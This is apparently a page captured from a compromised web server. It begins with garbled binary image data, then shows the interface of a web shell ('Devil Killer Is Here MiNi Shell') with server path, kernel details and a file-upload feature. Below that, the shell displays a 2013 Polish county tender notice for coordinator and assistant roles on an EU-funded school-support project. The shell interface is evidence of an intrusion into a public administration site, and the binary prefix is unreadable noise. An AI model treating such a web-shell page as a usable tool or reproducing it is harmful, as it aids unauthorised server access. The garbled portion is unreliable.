JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130919/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130919/191351-N-2013.html

<p class="kh_header"><b>Włocławek: Pełnienie funkcji członków Zespołu Zarządzającego Projektu pn.: -Kompleksowe wspomaganie rozwoju szkół i przedszkoli w powiecie włocławskim-, z podziałem na dwie części</b><br>
<b>Numer ogłoszenia: 191351 - 2013; data zamieszczenia: 19.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Włocławski , ul. Cyganka 28, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 230 46 00, faks 54 230 46 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.wloclawski</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji członków Zespołu Zarządzającego Projektu pn.: -Kompleksowe wspomaganie rozwoju szkół i przedszkoli w powiecie włocławskim-, z podziałem na dwie części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie funkcji członków Zespołu Zarządzającego Projektu pn.: -Kompleksowe wspomaganie rozwoju szkół i przedszkoli w powiecie włocławskim-, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytetu III -Wysoka jakość systemu oświaty-, Działania 3.5 - Kompleksowe wspomaganie rozwoju szkół, w ramach typu projektu: programy kompleksowego wspomagania szkół oraz przedszkoli, z podziałem na dwie części. 
2. Część nr 1 zamówienia: Pełnienie funkcji Koordynatora Projektu pn.: -Kompleksowe wspomaganie rozwoju szkół i przedszkoli w powiecie włocławskim-, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytetu III -Wysoka jakość systemu oświaty-, Działania 3.5 - Kompleksowe wspomaganie rozwoju szkół, w ramach typu projektu: programy kompleksowego wspomagania szkół oraz przedszkoli.
Szczegółowy opis przedmiotu części zamówienia:
1) Do zadań i obowiązków Koordynatora Projektu należeć będzie w szczególności:
- terminowe i właściwe realizowanie całości projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach;
- nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem;
- kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i EFS;
- nadzorowanie bieżących postępów w realizacji projektu;
- nadzór nad całością prac związanych z realizacją projektu i ich jakością;
- koordynacja działań merytorycznych i logistycznych związanych z projektem;
- utrzymywanie stałych kontaktów z opiekunami projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów;
- akceptacja korespondencji związanej z projektem do Instytucji Pośredniczącej;
- planowanie działań i wywiązywanie się ze wskaźników;
- kierowanie bieżącymi sprawami związanymi z realizacją projektu;
- poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu;
- współpraca z SORE i koordynatorami sieci  w zakresie przygotowania szczegółowych programów i terminów zajęć oraz ich akceptacja;
- akceptacja ankiet ewaluacyjnych dla potrzeb ewaluacji;
- nadzór na monitoringiem i ewaluacją projektu oraz jego promocja;
- kontrola bieżącej sprawozdawczości (merytorycznej i finansowej) realizacji Projektu;
- udział merytoryczny w terminowym przygotowaniu wniosków o płatność wraz z załącznikami, oraz ich akceptacja;
- przygotowanie i archiwizacja dokumentacji projektowej;
- bieżący monitoring i kontrola realizacji zadań w projekcie;
- weryfikacja i akceptacja zbiorczych arkuszy PEFS;
- sporządzanie projektów umów cywilno-prawnych;
- powoływanie komisji rekrutacyjnej;
- akceptacja planu pracy komisji rekrutacyjnej i regulaminu rekrutacji uczestników w projekcie;
- podejmowanie niezbędnych działań mających na celu osiągnięcie wskaźników rezultatu projektu;
- informowanie zamawiającego o wszelkich nieprawidłowościach związanych z realizacją projektu;
- udział w szkoleniach organizowanych przez ORE   z zakresu realizacji projektu;
- przygotowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu;
- przygotowanie, koordynowanie i nadzorowanie prac związanych z promocją, ewaluacją, realizacją oraz rozliczeniem projektu;
- przygotowanie upoważnień do przetwarzania danych osobowych dla personelu projektu oraz zgłoszenie ich do rejestru upoważnień obowiązujących w Starostwie Powiatowym; 
- przestrzeganie procedur związanych z ochroną danych osobowych uczestników projektu, personelu;
- organizowanie spotkań monitorujących z pracownikami projektu oraz dyrektorami szkół uczestniczących w projekcie;
- zgłaszanie do ORE w Warszawie wszelkich zmian w realizacji i w budżecie projektu, przygotowywanie formularzy zmian merytorycznych i budżetowych;
- prowadzenie kontroli realizacji działań oraz nadzór nad monitoringiem wykorzystania materiałów do części praktycznych  zakupionych w ramach projektu;
- zorganizowanie biura projektu zgodnie z założeniami i wytycznymi (zakupy, oznakowanie);
- zapewnienie właściwego przepływu informacji pomiędzy pracownikami projektu;
- nadzór nad prowadzeniem bazy danych PEFS; 
- akceptacja zapotrzebowań na materiały biurowe i dydaktyczne;
- przygotowanie opisu przedmiotu zamówienia w części dotyczącej usług i oszacowania wartości zamówienia;
- przygotowanie, prowadzenie oraz uczestniczenie we wszystkich czynnościach przewidzianych w procedurze zamówień publicznych na dostawy oraz usługi przewidziane w budżecie projektu zgodnie z ustawą Prawo zamówień publicznych wraz z dokumentowaniem postępowań. Praca w Komisjach Przetargowych powołanych do przeprowadzenia postępowań w związku z zastosowaniem ustawy Pzp przy realizacji zadań projektowych; 
- nadzór nad prawidłową realizacją umów na świadczenie usług oraz dostawy, zawartych w ramach postępowań o udzielenie zamówienia publicznego; 
- śledzenie dokumentów, wytycznych, które w trakcie realizacji projektu mogą ulec zmianie w celu zapewnienia zgodności projektu z wytycznymi, jak również prawem RP i UE;
- nadzorowanie bieżących postępów realizacji projektu i ich jakością;
- nadzorowanie prawidłowego przeprowadzenia promocji projektu;
- zatwierdzanie planów pracy dla poszczególnych działań projektowych;
- przydzielanie i koordynowanie zadań dla wszystkich osób zaangażowanych w realizację projektu; 
- kontrola jakości realizacji zadań pod kątem osiągnięcia założonych wskaźników i jego wykonanie;
- akceptacja wniosków o płatność i terminowym ich przekazaniem Instytucji Pośredniczącej oraz sprawozdań rzeczowych z postępów realizacji projektu, w tym sporządzenie ostatniego wniosku o płatność zgodnie obowiązującymi dokumentami programowymi i aktualnymi wytycznymi Instytucji Pośredniczącej; 
- obecność podczas kontroli projektu;
- zatwierdzanie pod względem merytorycznym dokumentów, które powstały w projekcie;
- inne zadania niezbędne do prawidłowej realizacji projektu nie wymienione wyżej a zlecone przez Zamawiającego.
2) Przedmiot zamówienia realizowany będzie w Wydziale Rozwoju, Edukacji i Spraw Społecznych Starostwa Powiatowego we Włocławku, ul. Cyganka 28 oraz w miarę potrzeb w szkołach wdrażających projekt.
 3) Łączny wymiar zaangażowania koordynatora projektu w realizację zadań we wszystkich projektach NSRO nie może przekraczać 176 godzin miesięcznie, łącznie 
z  zaangażowaniem do niniejszego projektu 80 godzin miesięcznie.
4) Koordynator projektu nie może być zatrudniony w instytucji  uczestniczącej 
w realizacji PO KL na podstawie stosunku pracy, chyba, że nie zachodzi konflikt interesów 
i podwójne finansowanie.
5) W przypadku wykonywania zadań w więcej niż w jednym projekcie, w ramach Narodowych Strategicznych Ram Odniesienia (NSRO), Zleceniobiorca jest zobowiązany do prowadzenia i udostępniania Zleceniodawcy - w okresie realizacji zadań w ramach projektu - ewidencji godzin i zadań realizowanych w ramach wszystkich projektów NSRO, w której Zleceniobiorca jest zaangażowany. Ewidencja powinna być prowadzona miesięcznie i przekazywana Zleceniodawcy w terminie do 5 dni kalendarzowych od ostatniego dnia poprzedniego miesiąca. 
6) Koordynator będzie wykonywał  przedmiot zamówienia w wymiarze 80 godzin miesięcznie w dniach od poniedziałku do piątku (od 1 do 8 godzin dziennie - codziennie w zależności od natężenia zadań), w Wydziale Rozwoju, Edukacji i Spraw Społecznych Starostwa Powiatowego we Włocławku, ul. Cyganka 28 oraz w miarę potrzeb w szkołach wdrażających projekt. Zleceniodawca w sytuacjach takich jak m.in. choroba, zdarzenie losowe czy zaplanowany urlop osoby wykonującej przedmiot umowy dopuszcza możliwość odstąpienia od obowiązku codziennej pracy w wskazanym miejscu pod warunkiem poinformowania o tym fakcie Zleceniodawcy oraz pod warunkiem wywiązania się Zleceniobiorcy z obowiązku realizacji 80 godzin pracy miesięcznie. Rozliczenie wymiaru godzinowego pracy w projekcie odbywać się będzie miesięcznie.
3. Część nr 2 zamówienia: Pełnienie funkcji Asystenta Koordynatora Projektu pn.: -Kompleksowe wspomaganie rozwoju szkół i przedszkoli w powiecie włocławskim-, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytetu III -Wysoka jakość systemu oświaty-, Działania 3.5 - Kompleksowe wspomaganie rozwoju szkół, w ramach typu projektu: programy kompleksowego wspomagania szkół oraz przedszkoli.
Szczegółowy opis przedmiotu części zamówienia:
1) Do zadań i obowiązków Asystenta Koordynatora Projektu należeć będzie w szczególności:
- terminowe i właściwe realizowanie całości projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach;
- przygotowywanie opisu przedmiotu zamówienia w części dotyczących zakupów na potrzeby realizacji projektu oraz oszacowanie ich wartości zamówienia;
- kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i EFS;
- nadzorowanie bieżących postępów w realizacji projektu;
- nadzór nad całością prac związanych z realizacją projektu i ich jakością;
- Koordynacja działań merytorycznych i logistycznych związanych z projektem;
- utrzymywanie stałych kontaktów z opiekunami projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów;
- przygotowanie korespondencji związanej z projektem do Instytucji Pośredniczącej;
- planowanie działań i wywiązywanie się ze wskaźników;
- kierowanie bieżącymi sprawami związanymi z realizacją projektu;
- poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu;
- współpraca z SORE i koordynatorami sieci  w zakresie przygotowania szczegółowych programów i terminów zajęć;
- opracowanie wzoru ankiet ewaluacyjnych dla potrzeb ewaluacji;
- nadzór na monitoringiem i ewaluacją projektu oraz jego promocja;
- kontrola bieżącej sprawozdawczości (merytorycznej i finansowej) realizacji Projektu;
- udział merytoryczny w terminowym przygotowaniu wniosków o płatność wraz z załącznikami;
- przygotowanie i archiwizacja dokumentacji projektowej;
- bieżący monitoring i kontrola realizacji zadań w projekcie;
- sporządzanie zbiorczych arkuszy PEFS;
- opracowanie planu pracy komisji rekrutacyjnej;
- przygotowanie, prowadzenie oraz uczestniczenie we wszystkich czynnościach przewidzianych w procedurze zamówień publicznych na dostawy oraz usługi przewidziane w budżecie projektu zgodnie z ustawą Prawo zamówień publicznych wraz z dokumentowaniem postępowań. Praca w Komisjach Przetargowych powołanych do przeprowadzenia postępowań w związku z zastosowaniem ustawy Pzp przy realizacji zadań projektowych;
- obecność podczas kontroli projektu;
- inne zadania niezbędne do prawidłowej realizacji projektu nie wymienione wyżej, a zlecone przez zamawiającego;
- pełnienie zadań koordynatora podczas jego nieobecności.
2) Przedmiot umowy realizowany będzie w Wydziale Rozwoju, Edukacji i Spraw Społecznych Starostwa Powiatowego we Włocławku, ul. Cyganka 28 oraz w miarę potrzeb w szkołach wdrażających projekt. 
3) Łączny wymiar zaangażowania asystenta koordynatora projektu w realizację zadań we wszystkich projektach NSRO nie może przekraczać 176 godzin miesięcznie, łącznie 
z  zaangażowaniem do niniejszego projektu 60 godzin miesięcznie.
4) Asystent koordynatora projektu nie może być zatrudniony w instytucji  uczestniczącej 
w realizacji PO KL na podstawie stosunku pracy, chyba, że nie zachodzi konflikt interesów i podwójne finansowanie.
5) W przypadku wykonywania zadań w więcej niż w jednym projekcie, w ramach Narodowych Strategicznych Ram Odniesienia (NSRO), Zleceniobiorca jest zobowiązany do prowadzenia i udostępniania Zleceniodawcy - w okresie realizacji zadań w ramach projektu - ewidencji godzin i zadań realizowanych w ramach wszystkich projektów NSRO, w której Zleceniobiorca jest zaangażowany. Ewidencja powinna być prowadzona miesięcznie i przekazywana Zleceniodawcy w terminie do 5 dni kalendarzowych od ostatniego dnia poprzedniego miesiąca. 
6) Asystent koordynatora będzie wykonywał  przedmiot zamówienia w wymiarze 60 godzin miesięcznie w dniach od poniedziałku do piątku (od 1 do 8 godzin dziennie - codziennie w zależności od natężenia zadań), w Wydziale Rozwoju, Edukacji i Spraw Społecznych Starostwa Powiatowego we Włocławku, ul. Cyganka 28 oraz w miarę potrzeb w szkołach wdrażających projekt. Zleceniodawca w sytuacjach takich jak m.in. choroba, zdarzenie losowe czy zaplanowany urlop osoby wykonującej przedmiot umowy dopuszcza możliwość odstąpienia od obowiązku codziennej pracy w wskazanym miejscu pod warunkiem poinformowania o tym fakcie Zleceniodawcy oraz pod warunkiem wywiązania się Zleceniobiorcy z obowiązku realizacji 60 godzin pracy miesięcznie. Rozliczenie wymiaru godzinowego pracy w projekcie odbywać się będzie miesięcznie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.50.00.00-9, 79.42.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia, do dnia 27 września 2013 r. do godz. 9:00, wadium  w wysokości: dla części nr 1 zamówienia 2.000,00 zł (słownie: dwa tysiące złotych), dla części nr 2 zamówienia 1.000,00 zł (słownie: jeden tysiąc złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli:
- złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kryteria weryfikacji predyspozycji wykonawcy, poziom minimalny uznawania zdolności wykonawców do realizacji zamówienia w zakresie warunku  wskazanego w art. 22 ust. 1 pkt 2 ustawy (w zakresie posiadania wiedzy i doświadczenia):
Warunek ten będzie spełniony przez wykonawcę, jeżeli:
dla części nr 1 zamówienia
- złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy;
dla części nr 2 zamówienia
- wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. Wymagane minimum: przygotowanie i/lub realizacja projektów finansowanych ze środków UE, w tym w szczególności dwie usługi odpowiadające swoim rodzajem przedmiotowi zamówienia, tj. pełnienie funkcji członka Zespołu Zarządzającego Projektem na stanowisku, co najmniej asystenta koordynatora (lub równoważnego) przy wdrażaniu, co najmniej 2 projektów edukacyjnych współfinansowanych ze środków EFS o wartości co najmniej 1.000.000,00 złotych brutto każdy;
- wykaże, w złożonym wykazie i załączonych dowodach, że wywiązuje się ze swych dotychczasowych zobowiązań w stopniu, który nie podważa posiadania odpowiedniego poziomu kwalifikacji, kompetencji i rzetelności wymaganego dla należytego wywiązania się z zobowiązań przy realizacji niniejszego zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli:
- złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli:
dla części nr 1 zamówienia:
- dysponuje osobą posiadającą wykształcenie wyższe pedagogiczne, nauczyciel dyplomowany, ukończone studia podyplomowe z zakresu zarządzania projektami z wykorzystaniem funduszy pomocowych UE oraz posiadającą umiejętność pracy w zespole i bardzo dobrą umiejętność obsługi Pakietu Ms Office;
dla części nr 2 zamówienia:
- dysponuje osobą posiadającą wykształcenie wyższe II stopnia, doświadczenie w przygotowaniu i/lub realizacji projektów finansowanych ze środków UE, w tym doświadczenie w wdrażaniu, co najmniej 2 projektów edukacyjnych współfinansowanych ze środków EFS o wartości co najmniej 1.000.000,00 złotych brutto każdy, na stanowisku, co najmniej asystenta koordynatora (lub równoważnego) oraz posiadającą umiejętność pracy w zespole i bardzo dobrą umiejętność obsługi Pakietu Ms Office;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli:
- złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia wykonawcy zamawiający żąda wskazania przez wykonawcę w wykazie głównych dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, potwierdzających spełnienie warunków dotyczących posiadania wiedzy i doświadczenia, określonych w pkt III.3.2);;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
